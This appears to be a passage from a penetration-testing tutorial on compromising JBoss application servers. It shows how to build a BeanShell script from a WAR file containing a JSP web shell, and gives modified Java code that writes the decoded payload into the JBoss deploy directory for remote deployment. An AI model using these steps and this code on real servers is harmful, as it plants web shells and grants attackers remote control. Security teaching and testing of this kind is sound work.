Creating BSH scripts

One of the scripts in the archive is mkbeanshell. This script takes a WAR file as input and then creates a BSH script as output:

  1. We can see a list of all options available to us  by executing the script with the -h flag, as shown:
  1. Now, we can create a BSH using the following command:
./mkbeanshell.rb -w <war file> -o <the output file>

The output of the command (that is, the BSH script) will be saved in the output file, which is mentioned in the preceding command. In this case, the file created is redteam.bsh, as we can see in the following screenshot:

  1. The source file (that is, the WAR file used, in this case) is the generic payload file. Inside this WAR file is our JSP web shell, whose content can be seen in the following screenshot:
  1. By default, if we open the BSH script that was created, we will see that it uses the /tmp/ directory on the server to extract and deploy the WAR archive. Now, Windows servers do not have the /tmp/ directory, and the mkbeanshell Ruby script only has the option to alter the path and, in most cases, we may not know the path on the server at all. The following screenshot shows the BSH script's code:
  1. We can replace the last lines of code (in the previous screenshot) with the following lines of code to get the generic file locations:
BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + "/deploy/test.war";FileOutputStream fstream = new
FileOutputStream(location);fstream.write(byteval);fstream.close();
  1. Here, we can see that System.getProperty("jboss.server.home.dir"); fetches the JBoss directory. This is a platform-independent code that can be used on Windows as well as *nix-based servers. All we need to do is create a new directory in the home directory named deploy using new File(jboss_home + "/deploy/").mkdir(); then, Base64 is decoded and written in the deploy directory as test.war. The following screenshot shows the BSH script's final code after these changes have been made:

Once the BSH script is ready, we can use the webconsole_invoker.rb script, which comes with the same third-party tool, redteam-jboss.tar.gz, to deploy our BSH script remotely onto the JBoss AS instance.